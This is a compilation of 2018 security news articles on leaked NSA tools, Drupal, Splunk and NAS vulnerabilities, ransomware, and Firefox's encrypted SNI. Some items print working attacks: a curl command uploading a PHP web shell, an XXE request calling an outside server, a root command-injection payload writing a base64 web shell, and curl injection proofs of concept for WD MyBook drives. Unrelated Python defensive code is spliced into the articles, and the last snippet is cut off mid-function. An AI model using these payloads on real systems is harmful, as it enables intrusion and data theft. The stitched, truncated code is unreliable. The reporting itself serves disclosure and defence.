DarkPulsar and other NSA hacking tools used in hacking operations in the wild
22.10.2018 securityaffairs

Attackers are targeting high-value servers using three hacking tools from the NSA arsenal, including DarkPulsar, that were leaked by the Shadow Brokers hacker group.
The hackers used the powerful cyber weapons to compromise systems used in aerospace, nuclear energy, R&D, and other industries.

According to experts from Kaspersky Lab, threat actors leverage NSA tools DarkPulsar, DanderSpritz and Fuzzbunch to infect Windows Server 2003 and 2008 systems in 50 organizations in Russia, Iran, and Egypt.

The infected vulnerable servers are used in some 50 organizations within industries including aerospace and nuclear energy, particularly those with large IT and R&D departments.

“DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical windows interface similar to botnets administrative panels as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for not-FuzzBunch-controlled victims.” Kaspersky Lab experts Andrey Dolgushev, Dmitry Tarakanov, and Vasily Berdnikov wrote.

“Fuzzbunch on the other hand provides a framework for different utilities to interact and work together. It contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc.”

DarkPulsar is a backdoor that could be used by attackers in conjunction with the Fuzzbunch exploit kit to gain remote access to the targeted server.

Once the backdoor is established the attackers could use the plugins of DanderSpritz to monitor and exfiltrate data from the compromised machines.


Each hacking tool supports a set of plugins designed for different tasks: the FuzzBunch plugins are used for reconnaissance and compromising the target system, while the DanderSpritz plugins are used for managing already infected victims.

The discovery of this latest wave of attacks is very important because it demonstrates that threat actors can chain nation-state hacking tools and exploits into a powerful attack package. It shows how attackers combined the tools to carry out highly sophisticated hacking operations.

“The discovery of the DarkPulsar backdoor helped in understanding its role as a bridge between the two leaked frameworks, and how they are part of the same attacking platform designed for long-term compromise, based on DarkPulsar’s advanced abilities for persistence and stealthiness,” Kaspersky Lab said.

“The implementation of these capabilities, such as encapsulating its traffic into legitimate protocols and bypassing entering credentials to pass authentication, are highly professional.”

The experts from Kaspersky also provided technical details and IoCs for the attacks leveraging the NSA tools.

It is important to remind that security patches are available for the vulnerabilities targeted by the leaked NSA exploits.

“The FuzzBunch and DanderSpritz frameworks are designed to be flexible and to extend functionality and compatibility with other tools,” conclude the experts.

“Each of them consists of a set of plugins designed for different tasks: while FuzzBunch plugins are responsible for reconnaissance and attacking a victim, plugins in the DanderSpritz framework are developed for managing already infected victims.”


Drupal dev team fixed Remote Code Execution flaws in the popular CMS
22.10.2018 securityaffairs

The Drupal development team has patched several vulnerabilities in version 7 and 8 of the popular CMS, including RCE flaws.
The development team of the Drupal content management system addressed several vulnerabilities in version 7 and 8, including some flaws that could be exploited for remote code execution.

The Drupal team fixed a critical vulnerability in the Contextual Links module, which fails to properly validate requested contextual links. The flaw could be exploited for remote code execution by an attacker holding an account with the “access contextual links” permission.

“The Contextual Links module doesn’t sufficiently validate the requested contextual links.” reads the security advisory.
“This vulnerability is mitigated by the fact that an attacker must have a role with the permission “access contextual links”.”

Another critical vulnerability fixed by the development team is an injection issue that resides in the DefaultMailSystem::mail() function. The root cause of the bug is the lack of sanitization of some variables for shell arguments when sending emails.

“When sending email some variables were not being sanitized for shell arguments, which could lead to remote code execution.” continues the advisory.

The remaining vulnerabilities addressed in the CMS have been assigned a “moderately critical” rating; they include a couple of open redirect bugs and an access bypass issue related to content moderation.

The vulnerabilities have been addressed with the release of Drupal 7.60, 8.6.2 and 8.5.8.

The Drupal team urges users to install the security updates as soon as possible; there is a concrete risk that threat actors in the wild will start exploiting these flaws in massive hacking campaigns.


Thousands of applications affected by a zero-day issue in jQuery File Upload plugin
22.10.2018 securityaffairs

A security researcher discovered a zero-day vulnerability, tracked as CVE-2018-9206, that affects older versions of the jQuery File Upload plugin since 2010.
Attackers can exploit the vulnerability to carry out several malicious activities, including defacement, exfiltration, and malware infection.

The flaw was reported by Akamai researcher Larry Cashdollar, who explained that many other packages that include the vulnerable code may be affected.

“This package has been included in various other packages and this code included in the projects web accessible path. It’s actively being exploited in the wild,” the researcher told the plugin author.

The jQuery File Upload is a jQuery widget “with multiple file selection, drag&drop support, progress bars, validation and preview images, audio and video.”

The plugin is widely adopted by numerous server-side platforms that support standard HTML form file uploads: PHP, Python, Ruby on Rails, Java, Node.js, Go, and others.

Cashdollar discovered two PHP files named upload.php and UploadHandler.php in the package’s source, which contained the file upload code.

Uploaded files were written to the files/ directory in the web root, so the expert wrote a command-line test with curl and a simple PHP shell to confirm that it was possible to upload a web shell and run commands on the server.

$ curl -F "files=@shell.php" http://example.com/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:

<?php $cmd=$_GET['cmd']; system($cmd);?>

“A browser connection to the test web server with cmd=id returned the user id of the web server’s running process. I suspected this vulnerability hadn’t gone unnoticed and a quick Google search confirmed that other projects that used this code or possibly code derived from it were vulnerable. There are a few Youtube videos demonstrating the attack for similar software packages.” wrote the expert.

Every project that uses the plugin is potentially affected; the researcher pointed out that there are a few YouTube PoC videos demonstrating exploitation of similar software packages.

Cashdollar also published a proof-of-concept (PoC) code.

The root cause of the problem is that Apache disabled support for .htaccess in version 2.3.9 to improve performance (the server no longer has to check for this file every time it accesses a directory) and to prevent users from overriding security features that were configured on the server.

The side effect is that this technical choice left some developers and their projects open to attacks, because the upload handler relied on a .htaccess file to stop uploaded scripts from being executed.

In order to address these changes and correct the file upload vulnerability in CVE-2018-9206 in Blueimp, the developer only allows file uploads to be of a content-type image.

“The internet relies on many security controls every day in order to keep our systems, data, and transactions safe and secure. If one of these controls suddenly doesn’t exist it may put security at risk unknowingly to the users and software developers relying on them.” concludes the expert.

“For software developers reviewing changes to the systems and libraries you rely on during the development of your project is a great idea as well. In the article above a security control was removed by Apache it not only removed a security control for Blueimp’s Jquery file upload software project but most of all of the forked code branches off of it. The vulnerability impacted many projects that depend on it from stand-alone web applications to WordPress plugins and other CMSs.”
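To illustrate the fix described above (accept only image uploads, and never rely on .htaccess to stop uploaded scripts from executing), here is an added example of a hardened upload validator. It is not the plugin's own code; the extension allowlist, magic-byte table and stored-name rules are assumptions chosen for the example.

```python
import re
from typing import Optional, Tuple

# Allowlist of image extensions the hardened handler accepts. Deliberately
# small: php, phtml, html, svg and anything else not listed is rejected.
ALLOWED_IMAGE_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Magic bytes for the allowed formats. The Content-Type header is supplied
# by the client, so the body itself is what we actually trust.
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
]

# Stem characters we are willing to keep; everything else is rejected.
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def sniff_image_type(data: bytes) -> Optional[str]:
    """Return the image type implied by the leading bytes, or None."""
    for prefix, kind in MAGIC:
        if data.startswith(prefix):
            return kind
    return None


def validate_upload(filename: str, content_type: str, data: bytes) -> Tuple[bool, str]:
    """Decide whether an upload may be stored.

    Returns (True, stored_name) or (False, reason). The stored name is
    rebuilt from validated parts, never taken verbatim from the client.
    """
    # 1. Strip any path components and refuse double extensions
    #    (shell.php.png style names) or names with no extension at all.
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if base.count(".") != 1:
        return False, "filename must have exactly one extension"
    stem, ext = base.rsplit(".", 1)
    ext = ext.lower()
    if not SAFE_STEM.match(stem):
        return False, "unsafe characters in filename"
    if ext not in ALLOWED_IMAGE_EXTENSIONS:
        return False, f"extension .{ext} not allowed"

    # 2. The declared type must be an image ...
    if not content_type.lower().startswith("image/"):
        return False, "content-type is not an image"

    # 3. ... and the bytes must actually look like one.
    sniffed = sniff_image_type(data)
    if sniffed is None:
        return False, "body does not look like an image"
    if ext == "jpeg":
        ext = "jpg"
    if sniffed != ext:
        return False, f"extension .{ext} does not match content ({sniffed})"

    # 4. Store under the normalised name. The upload directory itself should
    #    still be one the web server never executes scripts from; that is a
    #    server-configuration control, not something a .htaccess file is
    #    guaranteed to provide (the point of the advisory above).
    return True, f"{stem}.{ext}"
```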


Syrian victims of the GandCrab ransomware can decrypt their files for free
22.10.2018 securityaffairs

The developers of the GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.
The authors of the infamous GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.

Gandcrab developers’ post – Source Bleeping Computer

The crooks decided to release the decryption keys after a Syrian Twitter user published a harrowing message asking for help after photos of his deceased children were encrypted by the ransomware.

جميل سليمان
@kvbNDtxL0kmIqRU
· Oct 16, 2018
@coveware Hello, my name is Jameel, I am a Syrian father who lost both his sons to the cruel war the country is going through
All I have left of my children is the photos and videos I took of them before they were mercilessly killed. And now GandCrab V5.0.3 has locked all of them

جميل سليمان
@kvbNDtxL0kmIqRU
They want 600 dollars to give me back my children, that's what they've done, they've taken my boys away from me for some filthy money. How can I pay them 600 dollars if I barely have enough money to put food on the table for me and my wife?

7:55 AM - Oct 16, 2018
The GandCrab developers explained that it was not their intention to infect Syrian users, their message on the hacking forum includes a link to a zip file containing the decryption keys for Syrian victims.

“This zip file contains the readme.txt in Russian language and SY_keys.txt files. The readme.txt file contains information on how the key file is organized and information on why the keys were released.” states Bleeping Computer.

“The most important thing is not to indicate that he will help everyone. It will help only a citizen of Syria. Because of their political situation, economic and relations with the CIS countries. We regret that we did not initially add this country to the exceptions. But at least that way we can help them now.” reads the message from the author of the ransomware.

The SY_keys.txt file includes a list of 978 decryption keys for Syrian victims whose systems have been infected with GandCrab version 1.0 through 5.0.

Syrian victims not included in the file can receive decryption keys by providing the GandCrab developers with a picture of themselves, their passport, and their payment page. Sending crooks pictures of a passport is very risky: such documents could be resold by the crooks or used by them for identity theft.

Experts believe that security firms will develop a decryption tool based on the released encryption keys.


WizCase Report: Vulnerabilities found in WD My Book, NetGear Stora, SeaGate Home, Medion LifeCloud NAS
22.10.2018 securityaffairs

Security researchers from WizCase have discovered several vulnerabilities in WD My Book, NetGear Stora, SeaGate Home, Medion LifeCloud NAS.
NAS devices have become the storage device of choice for many small and medium businesses (SMB). They are inexpensive, easy to operate, and you can add storage if you’re running low on space. But are they secure enough to protect your company’s data? That was the question in our mind when we brought in security researchers Paulos Yibelo and Daniel Eshetu to see if they could exploit any vulnerabilities in the leading NAS devices.

We focused on discovering only critical vulnerabilities that can be exploited remotely without any user interaction. Meaning, authentication bypasses weren’t enough. We wanted to execute commands on the devices remotely with the highest privileges. We were successful in all the devices.

Summary of Our Findings
We used four popular NAS devices for this project

WD My Book,
NetGear Stora
SeaGate Home
Medion LifeCloud NAS
We successfully gained root remote command execution in the devices, and therefore the network they are on, simply by knowing their IP addresses.

All four NAS devices tested suffer from zero-day unauthenticated root remote command execution (preauth RCE) vulnerabilities.
The vulnerabilities allow hackers, governments, or anyone with malicious intent to read files, add/remove users, add/modify existing data, or execute commands with the highest privileges on all of the devices.
It is our belief that many other NAS devices suffer from similar vulnerabilities, as the safeguards expected from NAS devices seem to be missing across the board.
Both vulnerabilities (dubbed CVE-2018-18472 and CVE-2018-18471) remain unpatched at the time of this publication.
There are nearly 2 million affected devices online.
CVE-2018-18471 – XXE and Unauthenticated Remote Command Execution in Axentra Hipserv NAS firmware.
Axentra Hipserv is a NAS OS that runs on multiple devices and provides cloud-based login and file storage and management functionalities for different devices. It’s used in different devices from different vendors, the affected devices sharing the firmware are:

Netgear Stora
Seagate GoFlex Home
Medion LifeCloud (maybe more).
The company provides firmware with a web interface that mainly uses PHP as its server-side language. The web interface has a REST API endpoint and a typical web management interface with file manager support.

Firmware Analysis.

After extracting the firmware and decoding the files, the php files were located in /var/www/html/ with the webroot in /var/www/html/html. The main handler for the web interface is homebase.php and RESTAPIController.php is the main handler for the rest API. All the php files were encrypted using IONCube which has a known public decoder and given the version used was an old one, decoding the files didn’t take long.

Part One: XXE

After decoding the files, most of the API endpoints and the web interface were not accessible without authentication. One of the few exceptions was a handful of endpoints in the REST API interface. One of those endpoints is located at /api/2.0/rest/aggregator/xml and loads XML data from the POST body; it uses DOMDocument for loading (parsing) the XML, which should not be vulnerable to XXE attacks.

However, the version of libxml2 used as the backend in the firmware is an old one, which means that external entity loading was not disabled by default. This opened the endpoint to exploitation: through it, it was possible to read files and perform SSRF attacks. An example request is given below.

POST /api/2.0/rest/aggregator/xml HTTP/1.1
Host: 192.168.10.21
User-Agent: GoogleBot/2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 246
Cookie: HOMEBASEID=c4be432f8add72db591aaa72c0fbbd34
Connection: close
Upgrade-Insecure-Requests: 1

<?xml version="1.0"?>
<!DOCTYPE requests [
<!ELEMENT request (#PCDATA)>
<!ENTITY % dtd SYSTEM "http://192.168.10.20/XXE_CHECK">
%dtd;
]>
<requests>
<request href="/api/2.0/rest/3rdparty/facebook/" method="GET"></request>
</requests>

The above request caused the XML parser to make a request to our server at 192.168.56.1 for the file XXE_CHECK. Although the file read was useful for grabbing some sensitive files, XML can’t carry binary data, so it was not possible to dump the SQLite database to get usernames and passwords.

That meant we were able to read files and make SSRF requests on any of the devices below.

Netgear Stora
Seagate GoFlex Home
Medion LifeCloud
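As an added defensive example (not the firmware's or WizCase's code), the following pre-parse guard shows how an endpoint like the aggregator above can refuse documents that declare a DTD or entities before any parser sees them, so an old libxml2 default no longer matters. The sample bodies are constructed for the test; the callback host in the hostile sample is a placeholder.

```python
import re
from typing import List, Tuple
from xml.parsers import expat

# Constructed sample modelled on the request body above, with the callback
# host replaced by a placeholder. Used only to exercise the guard.
XXE_BODY = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE requests [\n'
    '<!ELEMENT request (#PCDATA)>\n'
    '<!ENTITY % dtd SYSTEM "http://ATTACKER_HOST_PLACEHOLDER/XXE_CHECK">\n'
    '%dtd;\n'
    ']>\n'
    '<requests>\n'
    '<request href="/api/2.0/rest/3rdparty/facebook/" method="GET"></request>\n'
    '</requests>\n'
).encode()

# Constructed sample of a legitimate aggregator request: no DTD at all.
BENIGN_BODY = (
    '<?xml version="1.0"?>\n'
    '<requests>'
    '<request href="/api/2.0/rest/3rdparty/facebook/" method="GET"></request>'
    '</requests>\n'
).encode()

# A legitimate aggregator request never needs a DOCTYPE or entity
# declaration, so their mere presence is grounds for rejection.
_DTD_MARKERS = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


class UnsafeXML(ValueError):
    """Raised when a request body declares a DTD or entities."""


def is_safe_xml(body: bytes) -> bool:
    """True if the body carries no DOCTYPE/ENTITY declarations."""
    return _DTD_MARKERS.search(body) is None


def parse_requests(body: bytes) -> List[Tuple[str, str]]:
    """Return (href, method) pairs from an aggregator body.

    Layer 1: reject any DTD up front. Layer 2: parse with pyexpat, which
    does not fetch external entities unless an ExternalEntityRefHandler is
    explicitly installed (none is here).
    """
    if not is_safe_xml(body):
        raise UnsafeXML("DOCTYPE/ENTITY declarations are not accepted")
    parser = expat.ParserCreate()
    found: List[Tuple[str, str]] = []

    def start_element(name, attrs):
        if name == "request":
            found.append((attrs.get("href", ""), attrs.get("method", "")))

    parser.StartElementHandler = start_element
    parser.Parse(body, True)
    return found
```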
Part Two: RCE

The next step was looking at how the web interface (the REST API in particular) performed root actions. The web server runs as a non-root user with no sudo rights; it turned out that the REST API makes calls to a local daemon named oe-spd, which runs on port 2000 bound to 127.0.0.1.

The daemon takes XML data, parses the request and carries out the action without any authentication, except making sure the request came from 127.0.0.1. What’s more, the daemon skips over junk data until it finds the string <?xml version="1.0"?>, as shown in the IDA snippet below.

strstr(*input_data, "<?xml version=\"1.0\"?>");

This made things a lot easier: since the request is going to be sent over HTTP, the daemon skipping over what it considers junk data was a real help. But since we can’t put the URL directly in the XML file, we make the XML parser send a request to a PHP script (or anything that performs the redirection) that redirects it to http://127.0.0.1:2000/a.php?d=*payload here*.

Since the daemon is chock-full of command execution bugs, it was easy to craft a request that triggered one. Additionally, since the daemon runs with root privileges, it’s possible to perform any action on the device. An example payload is given below.

* This payload uploads a simple php shell /var/www/html/html/u.php (<device-ip>/u.php?cmd=id).

<?xml version="1.0"?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name="disk">a`echo PD9waHAKZWNobyAnPHByZT4nOwpzeXN0ZW0oJF9HRVRbJ2NtZCddKTsKZWNobyAnPC9wcmU+JzsKPz4K | base64 -d >/var/www/html/html/u.php`</parameter></proxy_request>

Putting it all together.
To chain the vulnerabilities seamlessly we need a server the device can make an outbound connection to, plus a simple PHP script that redirects the parser to deliver the payload and handles a little multi-staging of payloads.

CVE-2018-18472 – WD MyBook Live Unauthenticated Remote Command Execution
WD MyBook Live and some models of WD MyCloud NAS contain a remotely exploitable vulnerability that lets anyone run commands on the device as root. The vulnerability exists in the language change/modify functionality of the REST API; the following PoC demonstrates this flaw.

PoC:

curl -kX PUT -d 'language=en_US`<linux command here>`' https://<NAS_IP>/api/1.0/rest/language_configuration

Examples:

curl -kX PUT -d 'language=en_US`id > /var/www/id.txt`' https://<NAS_IP>/api/1.0/rest/language_configuration

The PoC creates an id.txt file in the webroot containing the output of the id command. The file can be removed using the following PoC:

curl -kX PUT -d 'language=en_US`rm -rf /var/www/id.txt`' https://<NAS_IP>/api/1.0/rest/language_configuration

What does this mean for the affected NAS users?
If you are using one of the above devices and it is reachable from the WAN, remove it from the internet and make sure it is running only on a local, trusted network.
Contact the affected vendors and insist they release a patch as soon as possible!
We will update this article as a patch becomes available.
We also recommend you use a VPN to protect your computers and mobile devices from hackers. ExpressVPN and NordVPN both use AES 256-bit encryption and will secure all your data. (This won’t protect from an NAS attack, but it will protect you from other cyber attacks)


Hackers breached into system that interacts with HealthCare.gov
22.10.2018 securityaffairs

Centers for Medicare and Medicaid Services announced hackers breached into a computer system that interacts with HealthCare.gov.
Hackers breached a computer system that interacts with HealthCare.gov; according to the Centers for Medicare and Medicaid Services, the attackers accessed the sensitive personal data of some 75,000 people.

After experts discovered the intrusion, the system was shut down and the IT staff is working to restore operations.

“Officials said the hacked system was shut down and technicians are working to restore it before sign-up season starts Nov. 1 for health care coverage under the Affordable Care Act.” reported the Associated Press.

“The system that was hacked is used by insurance agents and brokers to directly enroll customers. All other sign-up systems are working.”

In the US, Barack Obama’s health care law ensures private coverage for about 10 million people, who in order to access the service have to provide extensive personal information, including Social Security numbers, income, and citizenship or legal immigration status.

Starting November 1, people can log in to HealthCare.gov, fill out an application, and enroll in a 2019 Marketplace health plan.

A spokesman for the Centers for Medicare and Medicaid declared that “nothing happened” to the HealthCare.gov website that is used by the general public.

“This concerns the agent and broker portal, which is not accessible to the general public,” he said.

Law enforcement is investigating the incident, and affected customers have been notified and will receive free credit protection.


Chinese Hackers Use 'Datper' Trojan in Recent Campaign
21.10.2018 securityweek
CyberSpy  Virus

A China-linked cyber espionage group known as Tick was observed using the Datper malware in a recent campaign, Cisco Talos security researchers reveal.

Also referred to as Redbaldknight and Bronze Butler, Tick has been launching various cyber-attacks against entities in South Korea and Japan over the past couple of years. The campaign Talos analyzed also used compromised websites located in the two countries as command and control (C&C) servers.

Although Tick has been using custom tools in each campaign, the researchers observed a series of recurring patterns in the use of infrastructure, such as overlaps in hijacked C&C domains or the use of the same IP.

Based on these infrastructure patterns, the experts discovered similarities between the Datper, xxmm backdoor, and Emdivi malware families that the threat actor has used in attacks.

Datper, the malware used in the campaign Talos analyzed, can execute shell commands on the victim machine, while also obtaining hostnames and drive information. The used infection vector, however, is unknown, Talos says.

The analyzed Datper variant used the compromised website of a legitimate Korean laundry service to host its C&C. Located at whitepia[.]co.kr, the site does not use SSL encryption or certificates, which rendered it vulnerable to attacks.

The security researchers observed other compromised websites as well being used as C&C servers as part of the attack. This led to the hypothesis that the malware could be delivered via web-based assaults, such as drive-by downloads or watering hole attacks.

Talos also discovered hosts that were being used as C&C servers although they were not connected to compromised websites. This would suggest that the hackers initially deployed the C&C infrastructure on legitimately obtained (and potentially purchased) hosts.

“The actor behind this campaign deployed and managed their C&C infrastructure mainly in South Korea and Japan. We confirmed that the actor periodically changed their C&C infrastructure and appears to have a history of identifying and penetrating vulnerable websites located in these countries,” Talos says.

Once on the infected machine, Datper would create a mutex object and retrieve several pieces of information from the victim machine, including system information and keyboard layout. Next, the malware attempts to issue an HTTP GET request to the C&C server (which was unavailable during investigation).

Some of the compromised websites were also used as C&C domains for the xxmm backdoor, also known as Murim or Wrim, which was previously associated with the threat actor, and which allows attackers to install additional malicious tools onto the infected machines. The two samples also use similar GET request URI paths.

A Datper variant compiled in March 2018 was observed using a legitimate website as C&C, resolving to the same IP used for the C&C infrastructure of the Emdivi malware family. This Trojan opens a backdoor on the compromised machines and was previously attributed to the threat actor behind the campaign "Blue termite."

“Talos’ investigation into attacks conducted by this actor indicates commonalities between the Datper, xxmm backdoor, and Emdivi malware families. Specifically, these similarities are in the C&C infrastructure of attacks utilizing these malware families. Some C&C domains used in these attacks resolve to hijacked, legitimate South Korean and Japanese hosts and may have been purchased by the attacker,” Talos concludes.


Flaws Open Telepresence Robots to Prying Eyes
21.10.2018 securityweek
Vulnerability

Vulnerabilities in telepresence robots could provide an attacker not only with command execution capabilities, but also with access to a live video stream from the device, Zingbox reports.

The healthcare IoT analytics platform provider has analyzed the VGo telepresence robot from Vecna. Nicknamed “Celia,” it has an XMPP chat client that supports voice and video communication over the VGoNet Cloud Network.

When a call is connected, the caller, whose face is displayed on the device’s screen, can control the robot using the client interface. In addition to voice calls and video streaming, the robot can speak text messages, move around at different speeds, take pictures, and recognize speech.

During its assessment of the device, Zingbox discovered five vulnerabilities that it reported to the manufacturer via ICS-CERT. These include issues usually found in IoT devices, such as insufficiently protected credentials and the transmission of sensitive information in cleartext.

One of the most important issues discovered in the device was the fact that firmware updates were being delivered over HTTP. Tracked as CVE-2018-8860, the vulnerability could allow an attacker sniffing the network to intercept the update.


Next, the attacker could use various tools to peek inside the intercepted firmware and find weaknesses to target in order to compromise the robot. The Zingbox security researchers did find such an issue: a CGI script, a development tool that was not supposed to be included in production builds.

“It could run limited commands on the robot, probably for diagnostics, such as those to view running processes, view logs, reboot the robot, and see network connections,” the researchers explain in a report (PDF).

Tracked as CVE-2018-8866, the next vulnerability is that most of the CGI’s GET parameters are vulnerable to command injection due to the lack of input validation. This provided the researchers with arbitrary command execution capabilities.

Because the CGI script runs with root privileges, the researchers could also gain unauthorized root access to the robot. Leveraging such privileges, an attacker could then abuse the robot to target other systems located in the same network segment.

Code execution could also be achieved with physical access to the USB slot located in the back of the robot. An attacker with a USB stick containing a file named startup.script inside a config folder in the root partition could gain code execution simply by plugging the stick into the port and rebooting the robot.

Once inside the robot, the researchers also discovered that Wi-Fi and robot XMPP credentials were stored in plain text (CVE-2018-8858). Armed with the Wi-Fi credentials, an attacker could then start attacking other assets on the network.

The security researchers also discovered chat information in log files, thus being able to read and steal text messages sent between the conversation partners. With the pictures taken by the robot being temporarily stored locally in the robot’s file system, an attacker who already has access to the robot can also retrieve those when they are created.

Moreover, an attacker “can capture live video streaming remotely and start watching the victims live,” the researchers warn.

The vendor has released an update that patches the vulnerabilities. Automatic updates are enabled by default.


Splunk Patches Several Flaws in Enterprise, Light Products
21.10.2018 securityweek 
Vulnerability

Splunk recently patched several vulnerabilities in its Enterprise and Light products, including flaws that have been rated “high severity.”

Splunk Enterprise allows organizations to search, analyze and visualize data collected from websites, apps, sensors and other devices. Splunk Light is a solution that automates log searching and analysis, along with server and network monitoring, in small IT networks.

The most serious of the vulnerabilities affecting these products – with a CVSS score of 8.1 (high severity) – is CVE-2018-7427, a cross-site scripting (XSS) issue in the Splunk Web interface.

Another serious flaw allows an attacker to cause a denial-of-service (DoS) condition by sending a specially crafted HTTP request to Splunkd, the system process that handles indexing, searching and forwarding. This bug is tracked as CVE-2018-7429.

CVE-2018-7432 is a similar DoS flaw that can be exploited using malicious HTTP requests sent to Splunkd, but the vendor has only assigned it a “medium severity” rating.

The last vulnerability, tracked as CVE-2018-7431 and also rated “medium severity,” has been described as a path traversal issue that allows an authenticated attacker to download arbitrary files from the Splunk Django app.

Two of the vulnerabilities affect Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.7, 6.3.x before 6.3.10, 6.2.x before 6.2.14, 6.1.x before 6.1.13, 6.0.x before 6.0.14, and Splunk Light before 6.6.0. CVE-2018-7432 affects the same versions, except for 6.1.x and 6.0.x. CVE-2018-7429 impacts Enterprise 6.4.x before 6.4.8, 6.3.x before 6.3.11, 6.2.x before 6.2.14, and Light before 6.5.0.

Splunk says it has found no evidence to suggest that these vulnerabilities have been exploited for malicious purposes.

“To mitigate these issues, Splunk recommends upgrading to the latest release and applying as many of the Hardening Standards from the Securing Splunk documentation as are relevant to your environment. Splunk Enterprise and Splunk Light releases are cumulative, meaning that future releases will contain fixes to these vulnerabilities, new features and other bug fixes,” Splunk said in an advisory.


Remote Code Execution Flaws Patched in Drupal
21.10.2018 securityweek
Vulnerability
Developers of the Drupal content management system (CMS) have patched several vulnerabilities in the 7 and 8 branches, including serious flaws that can be exploited for remote code execution.

One of the security holes, rated “critical,” affects the Contextual Links module, which fails to properly validate requested contextual links. The vulnerability can allow remote code execution, but the attacker requires an account with the “access contextual links” permission for exploitation.

Another “critical” flaw is an injection issue in the DefaultMailSystem::mail() function. The problem is caused by the lack of sanitization of some variables for shell arguments when sending emails.

It’s worth noting that in Drupal’s case “critical” is the second highest security risk level, after “highly critical.” “Moderately critical” follows “critical” on the criticality scale.

The other three vulnerabilities addressed in the CMS this week have been assigned a “moderately critical” rating. This includes an access bypass issue related to content moderation, and two open redirect bugs.

One of the open redirect issues was publicly documented before the patches were released. Drupal developers also warned that the changes implemented in order to fix the access bypass weakness can have implications for backwards compatibility.

The vulnerabilities have been patched with the release of Drupal 7.60, 8.6.2 and 8.5.8.

It’s important that users install security updates as soon as possible. Drupal vulnerabilities have often been exploited by malicious hackers in the past years.

The recently disclosed flaws dubbed Drupalgeddon2 and Drupalgeddon3 have been exploited to deliver cryptocurrency miners, RATs, tech support scams and other threats. In recent attacks, threat actors exploited Drupalgeddon2 to install a backdoor on compromised servers.


Mozilla Brings Encrypted SNI to Firefox Nightly
21.10.2018 securityweek
Safety

Mozilla says Firefox Nightly now supports encrypting the Transport Layer Security (TLS) Server Name Indication (SNI) extension, several weeks after Cloudflare announced it turned on Encrypted SNI (ESNI) across all of its network.

Introduced in 2003 to address the issue of accessing encrypted websites hosted at the same IP, the SNI extension was found to leak the identity of the sites that the user visits, which creates privacy issues. The problem is that, during the initial TLS handshake, the ClientHello message is sent unencrypted.

ESNI, an extension to TLS version 1.3 and above, attempts to mitigate that by replacing the SNI extension in ClientHello with an encrypted variant.

Now, Firefox Nightly users can take advantage of this added protection by enabling the encryption of SNI in the browser. ESNI will automatically work with any site that supports it, which currently only means sites hosted by Cloudflare.

Over 80% of web traffic today is encrypted with HTTPS, meaning that the content of the messages exchanged between a server and a user’s browser is kept private, but attackers can still learn which sites the user is accessing.

As Mozilla’s Eric Rescorla explains, browsing history information leaks to the network in four ways, namely through the TLS certificate message, DNS name resolution, the server IP address, and the SNI extension.

TLS 1.3 now encrypts the server certificate by default and DNS traffic can be protected by using DNS over HTTPS. The IP address remains an issue, somewhat mitigated by the fact that multiple sites often use the same address (which is the reason SNI was needed in the first place).

ESNI, Rescorla says, posed challenges because initial designs hurt performance, and TLS 1.3 was eventually published without it. As it turns out, the problem can be addressed through mass conversion to encrypted SNI.

“Big Content Distribution Networks (CDNs) host a lot of sites all on the same machines. If they’re willing to convert all their customers to ESNI at once, then suddenly ESNI no longer reveals a useful signal because the attacker can see what CDN you are going to anyway,” he explains.

With the added support for ESNI, Firefox becomes the first browser to adopt the technology. Users looking to take advantage of it should grab the latest Firefox Nightly build, make sure they have DNS over HTTPS enabled, and set the “network.security.esni.enabled” preference in about:config to “true”.

“This should automatically enable ESNI for any site that supports it. Right now, that’s just Cloudflare, which has enabled ESNI for all its customers, but we’re hoping that other providers will follow them,” Rescorla notes.
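To make the leak described above concrete, here is an added example (not Mozilla's or Cloudflare's code) that builds a minimal ClientHello and shows what a passive network observer can read from it: the host name in the plaintext server_name extension, versus only opaque bytes when the name travels in an encrypted extension. The 0xffce codepoint is the one the ESNI drafts used and is an assumption, and the "ciphertext" is a constructed stand-in rather than a real ESNI encoding.

```python
import struct

EXT_SERVER_NAME = 0x0000            # server_name extension, RFC 6066
EXT_ENCRYPTED_SERVER_NAME = 0xFFCE  # encrypted_server_name codepoint used by the ESNI drafts (assumption)


def _extension(ext_type, body):
    return struct.pack("!HH", ext_type, len(body)) + body


def sni_extension(hostname):
    """Plaintext server_name extension: a ServerNameList with a single host_name entry."""
    name = hostname.encode("ascii")
    entry = b"\x00" + struct.pack("!H", len(name)) + name   # name_type 0 = host_name
    return _extension(EXT_SERVER_NAME, struct.pack("!H", len(entry)) + entry)


def esni_extension(opaque_ciphertext):
    """Stand-in for encrypted_server_name: only ciphertext reaches the wire. The bytes
    are constructed for this example, not the draft's real ESNI encoding."""
    return _extension(EXT_ENCRYPTED_SERVER_NAME, opaque_ciphertext)


def build_client_hello(extensions):
    """Minimal TLS 1.3 ClientHello handshake message (record layer omitted), constructed."""
    body = (
        b"\x03\x03"                 # legacy_version = TLS 1.2, as TLS 1.3 requires
        + bytes(32)                 # random: zeros here, 32 random bytes on the wire
        + b"\x00"                   # legacy_session_id: empty
        + b"\x00\x02\x13\x01"       # cipher_suites: TLS_AES_128_GCM_SHA256 only
        + b"\x01\x00"               # legacy_compression_methods: null only
        + struct.pack("!H", len(extensions)) + extensions
    )
    return b"\x01" + len(body).to_bytes(3, "big") + body   # HandshakeType client_hello = 1


def parse_extensions(client_hello):
    """Walk the ClientHello as a passive observer would and return {ext_type: data}."""
    if len(client_hello) < 4 or client_hello[0] != 0x01:
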